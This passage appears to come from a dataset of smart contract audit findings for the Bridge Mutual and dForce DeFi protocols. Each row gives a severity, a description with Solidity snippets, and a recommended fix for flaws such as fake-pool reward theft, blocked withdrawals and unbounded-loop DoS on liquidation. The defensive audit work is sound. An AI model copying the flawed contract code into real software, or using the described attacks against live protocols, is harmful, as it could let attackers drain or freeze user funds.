On top of that check, it makes sure the total liquidity is positive.\\n```\\nrequire(\\_totalCoverTokens.add(\\_tokens) <= \\_totalLiquidity, ""PolicyBook: Requiring more than there exists"");\\nrequire(\\_totalLiquidity > 0, ""PolicyBook: The pool is empty"");\\n```\\n\\nBut there is no check for the number of quoted tokens. It should also be positive.","Add an additional check for the number of quoted tokens to be positive. The check could fail or return 0, depending on your use case.\\nIf you add a check for the number of quoted tokens to be positive, the check for `_totalLiquidity` to be positive becomes obsolete and can be removed.",,"```\\nfunction \\_buyPolicyFor(\\n address \\_policyHolderAddr,\\n uint256 \\_epochsNumber,\\n uint256 \\_coverTokens\\n) internal {\\n```\\n" +Anyone can win all the funds from the LiquidityMining without investing any DAI,high,"When a user decides to `investDAI` in the `LiquidityMining` contract, the policy book address is passed as a parameter:\\n```\\nfunction investDAI(uint256 \\_tokensAmount, address \\_policyBookAddr) external override {\\n```\\n\\nBut this parameter is never checked and only used at the end of the function:\\n```\\nIPolicyBook(\\_policyBookAddr).addLiquidityFromLM(msg.sender, \\_tokensAmount);\\n```\\n\\nThe attacker can pass the address of a simple multisig that will process this transaction successfully without doing anything. And pretend to invest a lot of DAI without actually doing that to win all the rewards in the `LiquidityMining` contract.",Check that the pool address is valid.,,"```\\nfunction investDAI(uint256 \\_tokensAmount, address \\_policyBookAddr) external override {\\n```\\n" +Liquidity withdrawal can be blocked,high,"The main problem in that issue is that the liquidity provider may face many potential issues when withdrawing the liquidity. Under some circumstances, a normal user will never be able to withdraw the liquidity. 
This issue consists of multiple factors that are interconnected and share the same solution.\\nThere are no partial withdrawals when in the queue. When the withdrawal request is added to the queue, it can only be processed fully:\\n```\\naddress \\_currentAddr = withdrawalQueue.head();\\nuint256 \\_tokensToWithdraw = withdrawalsInfo[\\_currentAddr].withdrawalAmount;\\n \\nuint256 \\_amountInDAI = convertDAIXtoDAI(\\_tokensToWithdraw);\\n \\nif (\\_availableLiquidity < \\_amountInDAI) {\\n break;\\n}\\n```\\n\\nBut when the request is not in the queue, it can still be processed partially, and the rest of the locked tokens will wait in the queue.\\n```\\n} else if (\\_availableLiquidity < convertDAIXtoDAI(\\_tokensToWithdraw)) {\\n uint256 \\_availableDAIxTokens = convertDAIToDAIx(\\_availableLiquidity);\\n uint256 \\_currentWithdrawalAmount = \\_tokensToWithdraw.sub(\\_availableDAIxTokens);\\n withdrawalsInfo[\\_msgSender()].withdrawalAmount = \\_currentWithdrawalAmount;\\n \\n aggregatedQueueAmount = aggregatedQueueAmount.add(\\_currentWithdrawalAmount);\\n withdrawalQueue.push(\\_msgSender());\\n \\n \\_withdrawLiquidity(\\_msgSender(), \\_availableDAIxTokens);\\n} else {\\n```\\n\\nIf there's a huge request in the queue, it can become a bottleneck that does not allow others to withdraw even if there is enough free liquidity.\\nWithdrawals can be blocked forever by the bots.\\nThe withdrawal can only be requested if there are enough free funds in the contract. But once these funds appear, the bots can instantly buy a policy, and for the normal users, it will be impossible to request the withdrawal. 
Even when a withdrawal is requested and then in the queue, the same problem appears at that stage.\\nThe policy can be bought even if there are pending withdrawals in the queue.","One of the solutions would be to implement the following changes, but the team should thoroughly consider them:\\nAllow people to request the withdrawal even if there is not enough liquidity at the moment.\\nDo not allow people to buy policies if there are pending withdrawals in the queue and cannot be executed.\\n(Optional) Even when the queue is empty, do not allow people to buy policies if there is not enough liquidity for the pending requests (that are not yet in the queue).\\n(Optional if the points above are implemented) Allow partial executions of the withdrawals in the queue.",,```\\naddress \\_currentAddr = withdrawalQueue.head();\\nuint256 \\_tokensToWithdraw = withdrawalsInfo[\\_currentAddr].withdrawalAmount;\\n \\nuint256 \\_amountInDAI = convertDAIXtoDAI(\\_tokensToWithdraw);\\n \\nif (\\_availableLiquidity < \\_amountInDAI) {\\n break;\\n}\\n```\\n +The totalCoverTokens can be decreased before the claim is committed,high,"The `totalCoverTokens` is decreased right after the policy duration ends (_endEpochNumber). 
When that happens, the liquidity providers can withdraw their funds:\\n```\\npolicyHolders[\\_msgSender()] = PolicyHolder(\\_coverTokens, currentEpochNumber,\\n \\_endEpochNumber, \\_totalPrice, \\_reinsurancePrice);\\n\\nepochAmounts[\\_endEpochNumber] = epochAmounts[\\_endEpochNumber].add(\\_coverTokens);\\n```\\n\\n```\\nuint256 \\_countOfPassedEpoch = block.timestamp.sub(epochStartTime).div(EPOCH\\_DURATION);\\n\\nnewTotalCoverTokens = totalCoverTokens;\\nlastEpochUpdate = currentEpochNumber;\\nnewEpochNumber = \\_countOfPassedEpoch.add(1);\\n\\nfor (uint256 i = lastEpochUpdate; i < newEpochNumber; i++) {\\n newTotalCoverTokens = newTotalCoverTokens.sub(epochAmounts[i]); \\n}\\n```\\n\\nOn the other hand, the claim can be created while the policy is still “active”. And is considered active until one week after the policy expired:\\n```\\nfunction isPolicyActive(address \\_userAddr, address \\_policyBookAddr) public override view returns (bool) {\\n PolicyInfo storage \\_currentInfo = policyInfos[\\_userAddr][\\_policyBookAddr];\\n\\n if (\\_currentInfo.endTime == 0) {\\n return false;\\n }\\n\\n return \\_currentInfo.endTime.add(STILL\\_CLAIMABLE\\_FOR) > block.timestamp;\\n}\\n```\\n\\nBy the time when the claim is created + voted, the liquidity provider can potentially withdraw all of their funds already, and the claim will fail.",Make sure that there will always be enough funds for the claim.,,"```\\npolicyHolders[\\_msgSender()] = PolicyHolder(\\_coverTokens, currentEpochNumber,\\n \\_endEpochNumber, \\_totalPrice, \\_reinsurancePrice);\\n\\nepochAmounts[\\_endEpochNumber] = epochAmounts[\\_endEpochNumber].add(\\_coverTokens);\\n```\\n" +The totalCoverTokens is not decreased after the claim happened,high,"When the claim happens and the policy is removed, the `totalCoverTokens` should be decreased instantly, that's why the scheduled reduction value is removed:\\n```\\nPolicyHolder storage holder = 
policyHolders[claimer];\\n\\nepochAmounts[holder.endEpochNumber] = epochAmounts[holder.endEpochNumber].sub(holder.coverTokens);\\ntotalLiquidity = totalLiquidity.sub(claimAmount);\\n\\ndaiToken.transfer(claimer, claimAmount);\\n \\ndelete policyHolders[claimer];\\npolicyRegistry.removePolicy(claimer);\\n```\\n\\nBut the `totalCoverTokens` is not changed and will have the coverage from the removed policy forever.",Decrease the `totalCoverTokens` inside the `commitClaim` function.,,"```\\nPolicyHolder storage holder = policyHolders[claimer];\\n\\nepochAmounts[holder.endEpochNumber] = epochAmounts[holder.endEpochNumber].sub(holder.coverTokens);\\ntotalLiquidity = totalLiquidity.sub(claimAmount);\\n\\ndaiToken.transfer(claimer, claimAmount);\\n \\ndelete policyHolders[claimer];\\npolicyRegistry.removePolicy(claimer);\\n```\\n" +The Queue remove function does not remove the item completely,high,"When removing an item in a queue, the following function is used:\\n```\\nfunction remove(UniqueAddressQueue storage baseQueue, address addrToRemove) internal returns (bool) {\\n if (!contains(baseQueue, addrToRemove)) {\\n return false;\\n }\\n\\n if (baseQueue.HEAD == addrToRemove) {\\n return removeFirst(baseQueue);\\n }\\n\\n if (baseQueue.TAIL == addrToRemove) {\\n return removeLast(baseQueue);\\n }\\n\\n address prevAddr = baseQueue.queue[addrToRemove].prev;\\n address nextAddr = baseQueue.queue[addrToRemove].next;\\n baseQueue.queue[prevAddr].next = nextAddr;\\n baseQueue.queue[nextAddr].prev = prevAddr;\\n baseQueue.queueLength--;\\n\\n return true;\\n}\\n```\\n\\nAs the result, the `baseQueue.queue[addrToRemove]` is not deleted, so the `contains` function will still return `True` after the removal.",Remove the element from the queue completely.,,"```\\nfunction remove(UniqueAddressQueue storage baseQueue, address addrToRemove) internal returns (bool) {\\n if (!contains(baseQueue, addrToRemove)) {\\n return false;\\n }\\n\\n if (baseQueue.HEAD == addrToRemove) {\\n 
return removeFirst(baseQueue);\\n }\\n\\n if (baseQueue.TAIL == addrToRemove) {\\n return removeLast(baseQueue);\\n }\\n\\n address prevAddr = baseQueue.queue[addrToRemove].prev;\\n address nextAddr = baseQueue.queue[addrToRemove].next;\\n baseQueue.queue[prevAddr].next = nextAddr;\\n baseQueue.queue[nextAddr].prev = prevAddr;\\n baseQueue.queueLength--;\\n\\n return true;\\n}\\n```\\n" +Optimization issue,medium,"The codebase is huge, and there are still a lot of places where these complications and gas efficiency can be improved.\\n`_updateTopUsers`, `_updateGroupLeaders`, `_updateLeaderboard` are having a similar mechanism of adding users to a sorted set which makes more storage operations than needed:\\n```\\nuint256 \\_tmpIndex = \\_currentIndex - 1;\\nuint256 \\_currentUserAmount = usersTeamInfo[msg.sender].stakedAmount;\\n \\nwhile (\\_currentUserAmount > usersTeamInfo[topUsers[\\_tmpIndex]].stakedAmount) {\\n address \\_tmpAddr = topUsers[\\_tmpIndex];\\n topUsers[\\_tmpIndex] = msg.sender;\\n topUsers[\\_tmpIndex + 1] = \\_tmpAddr;\\n \\n if (\\_tmpIndex == 0) {\\n break;\\n }\\n \\n \\_tmpIndex--;\\n}\\n```\\n\\nInstead of doing 2 operations per item that is lower than the new_item, same can be done with one operation: while `topUsers[_tmpIndex]` is lower than the new itemtopUsers[_tmpIndex + 1] = `topUsers[_tmpIndex]`.\\ncreating the Queue library looks like overkill `for` the intended task. It is only used `for` the withdrawal queue in the PolicyBook. The structure stores and processes extra data, which is unnecessary and more expensive. A larger codebase also has a higher chance of introducing a bug (and it happened here https://github.com/ConsenSys/bridge-mutual-audit-2021-03/issues/25). It's usually better to have a simpler and optimized version like described here issue 5.14.\\nThere are a few `for` loops that are using `uint8` iterators. 
It's unnecessary and can be even more expensive because, under the hood, it's additionally converted to `uint256` all the time. In general, shrinking data to `uint8` makes sense to optimize storage slots, but that's not the case here.\\nThe value that is calculated in a loop can be obtained simpler by just having a 1-line formula:\\n```\\nfunction \\_getAvailableMonthForReward(address \\_userAddr) internal view returns (uint256) {\\n uint256 \\_oneMonth = 30 days;\\n uint256 \\_startRewardTime = getEndLMTime();\\n \\n uint256 \\_countOfRewardedMonth = countsOfRewardedMonth[usersTeamInfo[\\_userAddr].teamAddr][\\_userAddr];\\n uint256 \\_numberOfMonthForReward;\\n \\n for (uint256 i = \\_countOfRewardedMonth; i < MAX\\_MONTH\\_TO\\_GET\\_REWARD; i++) {\\n if (block.timestamp > \\_startRewardTime.add(\\_oneMonth.mul(i))) {\\n \\_numberOfMonthForReward++;\\n } else {\\n break;\\n }\\n }\\n \\n return \\_numberOfMonthForReward;\\n}\\n```\\n\\nThe mapping is using 2 keys, but the first key is strictly defined by the second one, so there's no need for it:\\n```\\n// Referral link => Address => count of rewarded month\\nmapping (address => mapping (address => uint256)) public countsOfRewardedMonth;\\n```\\n\\nThere are a lot of structures in the code with duplicated and unnecessary data, for example:\\n```\\nstruct UserTeamInfo {\\n string teamName;\\n address teamAddr;\\n \\n uint256 stakedAmount;\\n bool isNFTDistributed;\\n}\\n```\\n\\nHere the structure is created for every team member, duplicating the team name for each member.",Optimize and simplify the code.,,```\\nuint256 \\_tmpIndex = \\_currentIndex - 1;\\nuint256 \\_currentUserAmount = usersTeamInfo[msg.sender].stakedAmount;\\n \\nwhile (\\_currentUserAmount > usersTeamInfo[topUsers[\\_tmpIndex]].stakedAmount) {\\n address \\_tmpAddr = topUsers[\\_tmpIndex];\\n topUsers[\\_tmpIndex] = msg.sender;\\n topUsers[\\_tmpIndex + 1] = \\_tmpAddr;\\n \\n if (\\_tmpIndex == 0) {\\n break;\\n }\\n \\n 
\\_tmpIndex--;\\n}\\n```\\n +The aggregatedQueueAmount value is used inconsistently,medium,"The `aggregatedQueueAmount` variable represents the cumulative DAIx amount in the queue that is waiting for the withdrawal. When requesting the withdrawal, this value is used as the amount of DAI that needs to be withdrawn, which may be significantly different:\\n```\\nrequire(totalLiquidity >= totalCoverTokens.add(aggregatedQueueAmount).add(\\_daiTokensToWithdraw),\\n ""PB: Not enough available liquidity"");\\n```\\n\\nThat may lead to allowing the withdrawal request even if it shouldn't be allowed and the opposite.",Convert `aggregatedQueueAmount` to DAI in the `_requestWithdrawal`.,,"```\\nrequire(totalLiquidity >= totalCoverTokens.add(aggregatedQueueAmount).add(\\_daiTokensToWithdraw),\\n ""PB: Not enough available liquidity"");\\n```\\n" +The claim can only be done once,medium,"When the claim happens, the policy is removed afterward:\\n```\\nfunction commitClaim(address claimer, uint256 claimAmount)\\n external \\n override\\n onlyClaimVoting\\n updateBMIDAIXStakingReward\\n{\\n PolicyHolder storage holder = policyHolders[claimer];\\n\\n epochAmounts[holder.endEpochNumber] = epochAmounts[holder.endEpochNumber].sub(holder.coverTokens);\\n totalLiquidity = totalLiquidity.sub(claimAmount);\\n \\n daiToken.transfer(claimer, claimAmount);\\n \\n delete policyHolders[claimer];\\n policyRegistry.removePolicy(claimer);\\n}\\n```\\n\\nIf the claim amount is much lower than the coverage, the users are incentivized not to submit it and wait until the end of the coverage period to accumulate all the claims into one.",Allow the policyholders to submit multiple claims until the `coverTokens` is not reached.,,"```\\nfunction commitClaim(address claimer, uint256 claimAmount)\\n external \\n override\\n onlyClaimVoting\\n updateBMIDAIXStakingReward\\n{\\n PolicyHolder storage holder = policyHolders[claimer];\\n\\n epochAmounts[holder.endEpochNumber] = 
epochAmounts[holder.endEpochNumber].sub(holder.coverTokens);\\n totalLiquidity = totalLiquidity.sub(claimAmount);\\n \\n daiToken.transfer(claimer, claimAmount);\\n \\n delete policyHolders[claimer];\\n policyRegistry.removePolicy(claimer);\\n}\\n```\\n" +iETH.exchangeRateStored may not be accurate when invoked from external contracts,high,"`iETH.exchangeRateStored` returns the exchange rate of the contract as a function of the current cash of the contract. In the case of `iETH`, current cash is calculated as the contract's ETH balance minus msg.value:\\n```\\n/\\*\\*\\n \\* @dev Gets balance of this contract in terms of the underlying\\n \\*/\\nfunction \\_getCurrentCash() internal view override returns (uint256) {\\n return address(this).balance.sub(msg.value);\\n}\\n```\\n\\n`msg.value` is subtracted because the majority of `iETH` methods are payable, and `msg.value` is implicitly added to a contract's balance before execution begins. If `msg.value` were not subtracted, the value sent with a call could be used to inflate the contract's exchange rate artificially.\\nAs part of execution, `iETH` makes calls to the `Controller`, which performs important checks using (among other things) the stored exchange rate. When `exchangeRateStored` is invoked from the `Controller`, the call context has a `msg.value` of 0. However, the `msg.value` sent by the initial `iETH` execution is still included in the contract's balance. This means that the `Controller` receives an exchange rate inflated by the initial call's `msg.value`.\\nThis problem occurs in multiple locations in the Controller:\\n`beforeMint` uses the exchange rate to ensure the supply capacity of the market is not reached. 
In this case, inflation would prevent the entire supply capacity of the market from being utilized:\\n```\\n// Check the iToken's supply capacity, -1 means no limit\\nuint256 \\_totalSupplyUnderlying =\\n IERC20Upgradeable(\\_iToken).totalSupply().rmul(\\n IiToken(\\_iToken).exchangeRateStored()\\n );\\nrequire(\\n \\_totalSupplyUnderlying.add(\\_mintAmount) <= \\_market.supplyCapacity,\\n ""Token supply capacity reached""\\n);\\n```\\n\\n`beforeLiquidateBorrow` uses the exchange rate via `calcAccountEquity` to calculate the value of the borrower's collateral. In this case, inflation would increase the account's equity, which could prevent the liquidator from liquidating:\\n```\\n(, uint256 \\_shortfall, , ) = calcAccountEquity(\\_borrower);\\n\\nrequire(\\_shortfall > 0, ""Account does not have shortfall"");\\n```\\n","Resolution\\nThis issue was addressed in commit `9876e3a` by using a modifier to track the current `msg.value` of payable functions.\\nRather than having the `Controller` query the `iETH.exchangeRateStored`, the exchange rate could be passed-in to `Controller` methods as a parameter.\\nEnsure no other components in the system rely on `iETH.exchangeRateStored` after being called from `iETH`.",,```\\n/\\*\\*\\n \\* @dev Gets balance of this contract in terms of the underlying\\n \\*/\\nfunction \\_getCurrentCash() internal view override returns (uint256) {\\n return address(this).balance.sub(msg.value);\\n}\\n```\\n +Unbounded loop in Controller.calcAccountEquity allows DoS on liquidation,high,"`Controller.calcAccountEquity` calculates the relative value of a user's supplied collateral and their active borrow positions. Users may mark an arbitrary number of assets as collateral, and may borrow from an arbitrary number of assets. 
In order to calculate the value of both of these positions, this method performs two loops.\\nFirst, to calculate the sum of the value of a user's collateral:\\n```\\n// Calculate value of all collaterals\\n// collateralValuePerToken = underlyingPrice \\* exchangeRate \\* collateralFactor\\n// collateralValue = balance \\* collateralValuePerToken\\n// sumCollateral += collateralValue\\nuint256 \\_len = \\_accountData.collaterals.length();\\nfor (uint256 i = 0; i < \\_len; i++) {\\n IiToken \\_token = IiToken(\\_accountData.collaterals.at(i));\\n```\\n\\nSecond, to calculate the sum of the value of a user's borrow positions:\\n```\\n// Calculate all borrowed value\\n// borrowValue = underlyingPrice \\* underlyingBorrowed / borrowFactor\\n// sumBorrowed += borrowValue\\n\\_len = \\_accountData.borrowed.length();\\nfor (uint256 i = 0; i < \\_len; i++) {\\n IiToken \\_token = IiToken(\\_accountData.borrowed.at(i));\\n```\\n\\nFrom dForce, we learned that 200 or more assets would be supported by the Controller. This means that a user with active collateral and borrow positions on all 200 supported assets could force any `calcAccountEquity` action to perform some 400 iterations of these loops, each with several expensive external calls.\\nBy modifying dForce's unit test suite, we showed that an attacker could force the cost of `calcAccountEquity` above the block gas limit. This would prevent all of the following actions, as each relies on calcAccountEquity:\\n`iToken.transfer` and `iToken.transferFrom`\\n`iToken.redeem` and `iToken.redeemUnderlying`\\n`iToken.borrow`\\n`iToken.liquidateBorrow` and `iToken.seize`\\nThe following actions would still be possible:\\n`iToken.mint`\\n`iToken.repayBorrow` and `iToken.repayBorrowBehalf`\\nAs a result, an attacker may abuse the unbounded looping in `calcAccountEquity` to prevent the liquidation of underwater positions. We provided dForce with a PoC here: gist.","There are many possible ways to address this issue. 
Some ideas have been outlined below, and it may be that a combination of these ideas is the best approach:\\nIn general, cap the number of markets and borrowed assets a user may have: The primary cause of the DoS is that the number of collateral and borrow positions held by a user is only restricted by the number of supported assets. The PoC provided above showed that somewhere around 150 collateral positions and 150 borrow positions, the gas costs of `calcAccountEquity` use most of the gas in a block. Given that gas prices often spike along with turbulent market conditions and that liquidations are far more likely in turbulent market conditions, a cap on active markets / borrows should be much lower than 150 each so as to keep the cost of liquidations as low as possible.\\ndForce should perform their own gas cost estimates to determine a cap, and choose a safe, low value. Estimates should be performed on the high-level `liquidateBorrow` method, so as to simulate an actual liquidation event. Additionally, estimates should factor in a changing block gas limit, and the possibility of opcode gas costs changing in future forks. 
It may be wise to make this cap configurable, so that the limits may be adjusted for future conditions.",,```\\n// Calculate value of all collaterals\\n// collateralValuePerToken = underlyingPrice \\* exchangeRate \\* collateralFactor\\n// collateralValue = balance \\* collateralValuePerToken\\n// sumCollateral += collateralValue\\nuint256 \\_len = \\_accountData.collaterals.length();\\nfor (uint256 i = 0; i < \\_len; i++) {\\n IiToken \\_token = IiToken(\\_accountData.collaterals.at(i));\\n```\\n +Fix utilization rate computation and respect reserves when lending,medium,"The utilization rate `UR` of an asset forms the basis for interest calculations and is defined as `borrows / ( borrows + cash - reserves)`.\\n```\\n/\\*\\*\\n \\* @notice Calculate the utilization rate: `\\_borrows / (\\_cash + \\_borrows - \\_reserves)`\\n \\* @param \\_cash Asset balance\\n \\* @param \\_borrows Asset borrows\\n \\* @param \\_reserves Asset reserves\\n \\* @return Asset utilization [0, 1e18]\\n \\*/\\nfunction utilizationRate(\\n uint256 \\_cash,\\n uint256 \\_borrows,\\n uint256 \\_reserves\\n) internal pure returns (uint256) {\\n // Utilization rate is 0 when there are no borrows\\n if (\\_borrows == 0) return 0;\\n\\n return \\_borrows.mul(BASE).div(\\_cash.add(\\_borrows).sub(\\_reserves));\\n}\\n```\\n\\nThe implicit assumption here is that `reserves` <= cash; in this case — and if we define `UR` as `0` for `borrows == 0` — we have `0` <= `UR` <=1. We can view `cash` - `reserves` as “available cash”. However, the system does not guarantee that `reserves` never exceeds `cash`. If `reserves` > `cash` (and borrows + `cash` - `reserves` > 0), the formula for `UR` above gives a utilization rate above `1`. 
This doesn't make much sense conceptually and has undesirable technical consequences; an especially severe one is analyzed in issue 4.4.","If `reserves > cash` — or, in other words, available cash is negative — this means part of the `reserves` have been borrowed, which ideally shouldn't happen in the first place. However, the `reserves` grow automatically over time, so it might be difficult to avoid this entirely. We recommend (1) avoiding this situation whenever it is possible and (2) fixing the `UR` computation such that it deals more gracefully with this scenario. More specifically:\\nLoan amounts should not be checked to be smaller than or equal to `cash` but `cash - reserves` (which might be negative). Note that the current check against `cash` happens more or less implicitly because the transfer just fails for insufficient `cash`.\\nMake the utilization rate computation return `1` if `reserves > cash` (unless borrows == `0`, in which case return `0` as is already the case).\\nRemark\\nInternally, the utilization rate and other fractional values are scaled by `1e18`. The discussion above has a more conceptual than technical perspective, so we used unscaled numbers. 
When making changes to the code, care must be taken to apply the scaling.",,"```\\n/\\*\\*\\n \\* @notice Calculate the utilization rate: `\\_borrows / (\\_cash + \\_borrows - \\_reserves)`\\n \\* @param \\_cash Asset balance\\n \\* @param \\_borrows Asset borrows\\n \\* @param \\_reserves Asset reserves\\n \\* @return Asset utilization [0, 1e18]\\n \\*/\\nfunction utilizationRate(\\n uint256 \\_cash,\\n uint256 \\_borrows,\\n uint256 \\_reserves\\n) internal pure returns (uint256) {\\n // Utilization rate is 0 when there are no borrows\\n if (\\_borrows == 0) return 0;\\n\\n return \\_borrows.mul(BASE).div(\\_cash.add(\\_borrows).sub(\\_reserves));\\n}\\n```\\n" +"If Base._updateInterest fails, the entire system will halt",medium,"Before executing most methods, the `iETH` and `iToken` contracts update interest accumulated on borrows via the method `Base._updateInterest`. This method uses the contract's interest rate model to calculate the borrow interest rate. If the calculated value is above `maxBorrowRate` (0.001e18), the method will revert:\\n```\\nfunction \\_updateInterest() internal virtual override {\\n InterestLocalVars memory \\_vars;\\n \\_vars.currentCash = \\_getCurrentCash();\\n \\_vars.totalBorrows = totalBorrows;\\n \\_vars.totalReserves = totalReserves;\\n\\n // Gets the current borrow interest rate.\\n \\_vars.borrowRate = interestRateModel.getBorrowRate(\\n \\_vars.currentCash,\\n \\_vars.totalBorrows,\\n \\_vars.totalReserves\\n );\\n require(\\n \\_vars.borrowRate <= maxBorrowRate,\\n ""\\_updateInterest: Borrow rate is too high!""\\n );\\n```\\n\\nIf this method reverts, the entire contract may halt and be unrecoverable. The only ways to change the values used to calculate this interest rate lie in methods that must first call `Base._updateInterest`. 
In this case, those methods would fail.\\nOne other potential avenue for recovery exists: the Owner role may update the interest rate calculation contract via TokenAdmin._setInterestRateModel:\\n```\\n/\\*\\*\\n \\* @dev Sets a new interest rate model.\\n \\* @param \\_newInterestRateModel The new interest rate model.\\n \\*/\\nfunction \\_setInterestRateModel(\\n IInterestRateModelInterface \\_newInterestRateModel\\n) external virtual onlyOwner settleInterest {\\n // Gets current interest rate model.\\n IInterestRateModelInterface \\_oldInterestRateModel = interestRateModel;\\n\\n // Ensures the input address is the interest model contract.\\n require(\\n \\_newInterestRateModel.isInterestRateModel(),\\n ""\\_setInterestRateModel: This is not the rate model contract!""\\n );\\n\\n // Set to the new interest rate model.\\n interestRateModel = \\_newInterestRateModel;\\n```\\n\\nHowever, this method also calls `Base._updateInterest` before completing the upgrade, so it would fail as well.\\nWe used interest rate parameters taken from dForce's unit tests to determine whether any of the interest rate models could return a borrow rate that would cause this failure. The default `InterestRateModel` is deployed using these values:\\n```\\nbaseInterestPerBlock: 0\\ninterestPerBlock: 5.074e10\\nhighInterestPerBlock: 4.756e11\\nhigh: 0.75e18\\n```\\n\\nPlugging these values in to their borrow rate calculations, we determined that the utilization rate of the contract would need to be `2103e18` in order to reach the max borrow rate and trigger a failure. 
Plugging this in to the formula for utilization rate, we derived the following ratio:\\n`reserves >= (2102/2103)*borrows + cash`\\nWith the given interest rate parameters, if token reserves, total borrows, and underlying cash meet the above ratio, the interest rate model would return a borrow rate above the maximum, leading to the failure conditions described above.","Note that the examples above depend on the specific interest rate parameters configured by dForce. In general, with reasonable interest rate parameters and a reasonable reserve ratio, it seems unlikely that the maximum borrow rate will be reached. Consider implementing the following changes as a precaution:\\nAs utilization rate should be between `0` and `1` (scaled by 1e18), prevent utilization rate calculations from returning anything above `1e18`. See issue 4.3 for a more thorough discussion of this topic.\\nRemove the `settleInterest` modifier from TokenAdmin._setInterestRateModel: In a worst case scenario, this will allow the Owner role to update the interest rate model without triggering the failure in `Base._updateInterest`.",,"```\\nfunction \\_updateInterest() internal virtual override {\\n InterestLocalVars memory \\_vars;\\n \\_vars.currentCash = \\_getCurrentCash();\\n \\_vars.totalBorrows = totalBorrows;\\n \\_vars.totalReserves = totalReserves;\\n\\n // Gets the current borrow interest rate.\\n \\_vars.borrowRate = interestRateModel.getBorrowRate(\\n \\_vars.currentCash,\\n \\_vars.totalBorrows,\\n \\_vars.totalReserves\\n );\\n require(\\n \\_vars.borrowRate <= maxBorrowRate,\\n ""\\_updateInterest: Borrow rate is too high!""\\n );\\n```\\n" +RewardDistributor requirement prevents transition of Owner role to smart contract,medium,"From dForce, we learned that the eventual plan for the system Owner role is to use a smart contract (a multisig or DAO). 
However, a requirement in `RewardDistributor` would prevent the `onlyOwner` method `_setDistributionFactors` from working in this case.\\n`_setDistributionFactors` calls `updateDistributionSpeed`, which requires that the caller is an EOA:\\n```\\n/\\*\\*\\n \\* @notice Update each iToken's distribution speed according to current global speed\\n \\* @dev Only EOA can call this function\\n \\*/\\nfunction updateDistributionSpeed() public override {\\n require(msg.sender == tx.origin, ""only EOA can update speeds"");\\n require(!paused, ""Can not update speeds when paused"");\\n\\n // Do the actual update\\n \\_updateDistributionSpeed();\\n}\\n```\\n\\nIn the event the Owner role is a smart contract, this statement would necessitate a complicated upgrade to restore full functionality.","Rather than invoking `updateDistributionSpeed`, have `_setDistributionFactors` directly call the internal helper `_updateDistributionSpeed`, which does not require the caller is an EOA.",,"```\\n/\\*\\*\\n \\* @notice Update each iToken's distribution speed according to current global speed\\n \\* @dev Only EOA can call this function\\n \\*/\\nfunction updateDistributionSpeed() public override {\\n require(msg.sender == tx.origin, ""only EOA can update speeds"");\\n require(!paused, ""Can not update speeds when paused"");\\n\\n // Do the actual update\\n \\_updateDistributionSpeed();\\n}\\n```\\n" +MSDController._withdrawReserves does not update interest before withdrawal,medium,"`MSDController._withdrawReserves` allows the Owner to mint the difference between an MSD asset's accumulated debt and earnings:\\n```\\nfunction \\_withdrawReserves(address \\_token, uint256 \\_amount)\\n external\\n onlyOwner\\n onlyMSD(\\_token)\\n{\\n (uint256 \\_equity, ) = calcEquity(\\_token);\\n\\n require(\\_equity >= \\_amount, ""Token do not have enough reserve"");\\n\\n // Increase the token debt\\n msdTokenData[\\_token].debt = msdTokenData[\\_token].debt.add(\\_amount);\\n\\n // Directly mint the 
token to owner\\n MSD(\\_token).mint(owner, \\_amount);\\n```\\n\\nDebt and earnings are updated each time the asset's `iMSD` and `MSDS` contracts are used for the first time in a given block. Because `_withdrawReserves` does not force an update to these values, it is possible for the withdrawal amount to be calculated using stale values.",Ensure `_withdrawReserves` invokes `iMSD.updateInterest()` and `MSDS.updateInterest()`.,,"```\\nfunction \\_withdrawReserves(address \\_token, uint256 \\_amount)\\n external\\n onlyOwner\\n onlyMSD(\\_token)\\n{\\n (uint256 \\_equity, ) = calcEquity(\\_token);\\n\\n require(\\_equity >= \\_amount, ""Token do not have enough reserve"");\\n\\n // Increase the token debt\\n msdTokenData[\\_token].debt = msdTokenData[\\_token].debt.add(\\_amount);\\n\\n // Directly mint the token to owner\\n MSD(\\_token).mint(owner, \\_amount);\\n```\\n" +permit functions use deployment-time instead of execution-time chain ID,low,"The contracts `Base`, `MSD`, and `MSDS` each have an EIP-2612-style `permit` function that supports approvals with EIP-712 signatures. 
We focus this discussion on the `Base` contract, but the same applies to `MSD` and `MSDS`.\\nWhen the contract is initialized, the chain ID is queried (with the `CHAINID` opcode) and becomes part of the `DOMAIN_SEPARATOR` — a hash of several values which (presumably) don't change over the lifetime of the contract and that can therefore be computed only once, when the contract is deployed.\\n```\\nfunction \\_initialize(\\n string memory \\_name,\\n string memory \\_symbol,\\n uint8 \\_decimals,\\n IControllerInterface \\_controller,\\n IInterestRateModelInterface \\_interestRateModel\\n) internal virtual {\\n controller = \\_controller;\\n interestRateModel = \\_interestRateModel;\\n accrualBlockNumber = block.number;\\n borrowIndex = BASE;\\n flashloanFeeRatio = 0.0008e18;\\n protocolFeeRatio = 0.25e18;\\n \\_\\_Ownable\\_init();\\n \\_\\_ERC20\\_init(\\_name, \\_symbol, \\_decimals);\\n \\_\\_ReentrancyGuard\\_init();\\n\\n uint256 chainId;\\n\\n assembly {\\n chainId := chainid()\\n }\\n DOMAIN\\_SEPARATOR = keccak256(\\n abi.encode(\\n keccak256(\\n ""EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)""\\n ),\\n keccak256(bytes(\\_name)),\\n keccak256(bytes(""1"")),\\n chainId,\\n address(this)\\n )\\n );\\n}\\n```\\n\\nThe `DOMAIN_SEPARATOR` is supposed to prevent replay attacks by providing context for the signature; it is hashed into the digest to be signed.\\n```\\nbytes32 \\_digest =\\n keccak256(\\n abi.encodePacked(\\n ""\\x19\\x01"",\\n DOMAIN\\_SEPARATOR,\\n keccak256(\\n abi.encode(\\n PERMIT\\_TYPEHASH,\\n \\_owner,\\n \\_spender,\\n \\_value,\\n \\_currentNonce,\\n \\_deadline\\n )\\n )\\n )\\n );\\naddress \\_recoveredAddress = ecrecover(\\_digest, \\_v, \\_r, \\_s);\\nrequire(\\n \\_recoveredAddress != address(0) && \\_recoveredAddress == \\_owner,\\n ""permit: INVALID\\_SIGNATURE!""\\n);\\n```\\n\\nThe chain ID is not necessarily constant, though. 
